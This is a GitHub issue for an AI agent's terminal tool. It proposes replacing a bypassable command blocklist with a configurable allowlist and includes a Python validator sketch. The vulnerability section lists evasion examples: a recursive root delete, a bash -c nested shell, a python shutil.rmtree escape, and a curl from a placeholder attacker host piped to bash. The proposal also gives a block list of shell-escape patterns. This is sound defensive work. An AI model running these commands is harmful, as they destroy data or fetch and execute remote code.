
[Phase 1.2.1] Replace terminal command blocklist with allowlist #17

@richard-devbot

Description

Phase

Phase 1 — Critical Security | Track 1.2 — Execution Controls | Priority: P0 CRITICAL

Vulnerability Details

File: operator_use/agent/tools/builtin/terminal.py:9-39
CWE: CWE-78 — OS Command Injection

Current blocklist uses substring matching and is trivially bypassable:

  • `rm -rf /` (double space)
  • `bash -c "rm -rf /"` (nested shell)
  • `python3 -c "import shutil; shutil.rmtree('/')"` (language escape)
  • `curl attacker.com/malware.sh | bash` (not blocked at all)

Fix

Switch to allowlist approach:
```python
ALLOWED_COMMAND_PREFIXES = {
    "git", "ls", "cat", "head", "tail", "grep", "find", "echo",
    "pip", "npm", "node", "python", "pytest", "cargo", "go",
    "docker", "kubectl",  # configurable per deployment
}
```

Additionally block:

  • Pipe to shell (`| bash`, `| sh`)
  • Command substitution (`$(...)`, backticks)
  • `eval`, `exec`, `source` as subcommands

Make allowlist configurable in config.json so deployments can customize.
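One way to implement the allowlist plus the extra shell-escape checks above, as an added illustration rather than the project's own `terminal.py` code: it reads the allowlist from a `config.json` document under an `allowed_commands` key (the key name is an assumption), tokenizes the command with `shlex` so quoting is honoured, matches the first word of every pipeline segment exactly against the allowlist, and rejects pipes to a shell, command substitution, and `eval`/`exec`/`source` anywhere in a segment. The sample commands in the test and in `__main__` are constructed.

```python
"""Allowlist command validator: an added illustration, not the project's terminal.py."""
import json
import shlex

# Constructed default mirroring the prefixes proposed in the issue.
DEFAULT_ALLOWED_COMMANDS = frozenset({
    "git", "ls", "cat", "head", "tail", "grep", "find", "echo",
    "pip", "npm", "node", "python", "pytest", "cargo", "go",
    "docker", "kubectl",
})
SHELL_INTERPRETERS = frozenset({"sh", "bash", "dash", "zsh", "ksh"})
FORBIDDEN_SUBCOMMANDS = frozenset({"eval", "exec", "source"})
SEPARATORS = frozenset({"|", "|&", "||", "&&", ";", "&"})
PUNCTUATION = frozenset("();<>|&")  # what shlex splits on with punctuation_chars=True


class CommandRejected(ValueError):
    """Raised when a command fails validation; the message states the reason."""


def load_allowlist(config_json: str) -> frozenset:
    """Read the allowlist from a config.json document (the key name is an assumption)."""
    cfg = json.loads(config_json)
    return frozenset(cfg.get("allowed_commands", DEFAULT_ALLOWED_COMMANDS))


def _tokenize(command: str) -> list:
    # posix=True honours quoting, so `git commit -m 'a; b'` keeps one argument;
    # punctuation_chars=True makes `|bash` come out as '|', 'bash', not one word.
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def _segments(tokens: list) -> list:
    """Split a token list into per-command word lists at |, |&, ||, &&, ; and &."""
    segments, words = [], []
    skip_next = False  # after a redirection the next token is a file, not a command
    for tok in tokens:
        if skip_next:
            skip_next = False
            continue
        if tok in SEPARATORS:
            segments.append(words)
            words = []
        elif tok.startswith(("<", ">")):
            skip_next = True
        elif tok and set(tok) <= PUNCTUATION:
            # anything else made only of shell punctuation, e.g. '(' or ')'
            raise CommandRejected(f"unsupported shell syntax {tok!r}")
        else:
            words.append(tok)
    segments.append(words)
    return segments


def check_command(command: str, allowed=DEFAULT_ALLOWED_COMMANDS) -> list:
    """Return the leading word of every segment of `command`, or raise CommandRejected."""
    # Substitution is checked on the raw string so it is caught even inside quotes.
    if "`" in command or "$(" in command:
        raise CommandRejected("command substitution is not permitted")
    try:
        tokens = _tokenize(command)
    except ValueError as exc:  # unbalanced quotes
        raise CommandRejected(f"malformed quoting: {exc}") from None
    heads = []
    for words in _segments(tokens):
        if not words:
            raise CommandRejected("empty command segment")
        head = words[0]
        if head in SHELL_INTERPRETERS:
            # rejects both `bash -c ...` and `... | bash`
            raise CommandRejected(f"shell interpreter {head!r} is not permitted")
        if FORBIDDEN_SUBCOMMANDS & set(words):
            raise CommandRejected("eval/exec/source are not permitted")
        if head not in allowed:  # exact match, not a string prefix
            raise CommandRejected(f"{head!r} is not on the allowlist")
        heads.append(head)
    return heads


def rejection_reason(command: str, allowed=DEFAULT_ALLOWED_COMMANDS):
    """Return None when the command passes, otherwise the reason it was rejected."""
    try:
        check_command(command, allowed)
    except CommandRejected as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed samples: the issue's evasion cases plus ordinary developer commands.
    for cmd in ["git status", "rm  -rf /", 'bash -c "rm -rf /"',
                "cat notes.txt | bash", "echo $(id)", "git log | head -n 5"]:
        print(f"{cmd!r:32} -> {rejection_reason(cmd) or 'allowed'}")
```

Two design points worth weighing when adapting this. The check compares the first word of each segment exactly against the allowlist rather than as a string prefix, because a prefix such as `go` would also admit any binary whose name happens to start with it. And an allowlist entry for an interpreter is an allowlist entry for arbitrary code: `python3 -c ...` is rejected here only because `python3` is not on the list, while `python -c ...` passes. The `exec` rule as written in the issue also catches `docker exec`, which deployments that rely on it will need to reconcile.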

Acceptance Criteria

  • Blocklist replaced with configurable allowlist
  • Shell escape patterns blocked (pipes, substitution, eval)
  • Allowlist configurable via config.json
  • Security tests cover: allowed commands, blocked commands, all evasion techniques
  • Existing functionality not broken (git, installs, scripts still work)
